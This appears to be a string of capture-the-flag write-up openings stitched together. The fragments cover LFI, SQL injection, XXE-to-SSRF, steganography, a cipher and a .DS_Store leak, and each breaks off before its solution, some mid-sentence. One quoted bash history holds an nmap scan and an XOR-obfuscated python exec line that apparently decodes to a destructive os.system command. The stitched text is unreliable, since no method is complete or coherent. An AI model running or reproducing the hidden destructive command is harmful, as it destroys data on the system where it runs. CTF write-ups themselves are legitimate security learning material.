We are presented with a web that allows us to register an account, then log in and be surprised with random disturbing videos xDDD. The web uses a page parameter to reference and include other pages and its vulnerable to LFI. For example, instead of going to http://magic.polictf.it/magic_things.php we can include it in index.php with http://magic.polictf.it/index.php?page=magic_things. So it seems that we can include any file ending in .php since we cannot seem to discard the extension using a null byte.
We are presented with an online shop to buy Referee t-shirts: They have ids from 1-8 and then 10 (skipping 9). There is also a search form that seems to escape some characters: The search submission is somehow weird. Our search is submitted to server that returns a hash that we submit back to get the actual results. So either way the hash is an encrypted version of our search query that is decrypted and executed in the server or its a hash that represents the query and its mapped to our query in the server sesssion.
Holidays are here! But John still hasn’t decided where to spend them and time is running out: flights are overbooked and prices are rising every second. Fortunately, John just discovered a website where he can book last second flight to all the European capitals; however, there’s no time to waste, so he just grabs his suitcase and thanks to his new smartphone he looks the city of his choice up while rushing to the airport.
We are given a text that looks like base64, so we decode it and find a gzip file that contains a text file with 296 phrases from the bible. These phrases are repited so we assigned a random character to each line and got something like: abccde fagh iajccbklb gh mbno bjho ghkpf gfq gpr fnogkl fd sngfb j cdkl rbhhjlb hd hfjfghfgih sgcc abct odu sgfa fab cbffbn vnbwubkigbhx yuf gpr kdf nbjcco lddz jf fajfx d0 fajfph bkdulae jajae gpr gk cdmb sgfa hgrtcb cdsbnijhb vcjlh sgfaduf htjibh jkz hfnjklb horydchx vcjl1cyafyllumvhokfyywsyd2 Using a substitution decipher and a little bit of manual correction we get:
We are given a pcap with the traffic generated to an old version of http://polictf.it. We can use NetworkMiner or similar tools to extract all files and compare them with the originals. logo.png differs from original and using StegoSolve we can find the secret flag:
We are welcomed with a login page where we can register a new account and log in with it. After logging to the application we received a: Hello pwntester. Try to login as 0ops! The first thing I looked for was for SQL injection in the register and login forms. The register one turned to be injectable and we can use Duplicate entry technique to dump the DB: Get the DB:
While playing Golden Mac 1 I found the ./bash_history for user salt that looked like: whoami pwd ls sudo nmap -sS 18.104.22.168/24 -p 22,80,3306 curl http://22.214.171.124/secret_blog/?id=1 msfconsole curl https://twitter.com/_SaxX_/status/580376290525650944 python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"<br /> shit! exit While the SaxX tweet was funny, the secret_blog looked promising. The IP was not accessible from the outside but we could leverage our XXE injection into a SSRF vulnerability and visit the blog.
We are given thousands of 3D coordinates in a text file: -4.751373,-2.622809,2.428588;-4.435134,-3.046589,2.406030;-4.788052,-2.661979,2.464709 -4.692748,-2.599611,2.629112;-4.656070,-2.560445,2.592991;-4.788052,-2.661979,2.464709 -4.692748,-2.599611,2.629112;-4.788052,-2.661979,2.464709;-4.435134,-3.046589,2.406030 -4.656070,-2.560445,2.592991;-4.516017,-2.714652,2.570303;-4.751373,-2.622809,2.428588 -4.656070,-2.560445,2.592991;-4.751373,-2.622809,2.428588;-4.788052,-2.661979,2.464709 -4.611258,-2.777269,2.405960;-4.435134,-3.046589,2.406030;-4.751373,-2.622809,2.428588 -4.572725,-2.644557,2.333280;-4.603014,-2.680354,2.364417;-4.592222,-2.663824,2.351891 -4.571442,-2.773632,2.381504;-4.564917,-2.826000,2.397583;-4.611258,-2.777269,2.405960 -4.571436,-2.742115,2.369542;-4.571442,-2.773632,2.381504;-4.611258,-2.777269,2.405960 -4.571436,-2.742115,2.369542;-4.611258,-2.777269,2.405960;-4.567214,-2.723559,2.360054 -4.567214,-2.723559,2.360054;-4.611258,-2.777269,2.405960;-4.560604,-2.711404,2.351613 -4.564917,-2.826000,2.397583;-4.435134,-3.046589,2.406030;-4.611258,-2.777269,2.405960 -4.560604,-2.711404,2.351613;-4.611258,-2.777269,2.405960;-4.614635,-2.748184,2.396883 ... ... If we represent them with matplotlib using somrthing like: from matplotlib import pyplot import pylab from mpl_toolkits.mplot3d import Axes3D x_vals =  y_vals =  z_vals =  data = open("x-y-z", "r").readlines() i = 0 for line in data: points = line.split(";") for point in points: point = point.
In the description and task title, it states that the developer uses a Mac Book Pro. So we looked for the .DS_Store in the application root directory and found one whose contents we can read with this simple python script: from ds_store import DSStore with DSStore.open('DS_Store', 'r+') as d: for i in d: print i Output: <index.php Iloc> <parse.class.php Iloc> <u_can_not_guess_this_haha.php Iloc> It seems the flag is in u_can_not_guess_this_haha.
A simple web where we can register and login in. Once logged in, we can change our password. The home page shows a message from Tales from two cities and the email we used for log in. There is a SQL injection affecting the UPDATE statement sent with the Modify password feature. The idea is to modify the statement to change also the email (that we can read in the home page):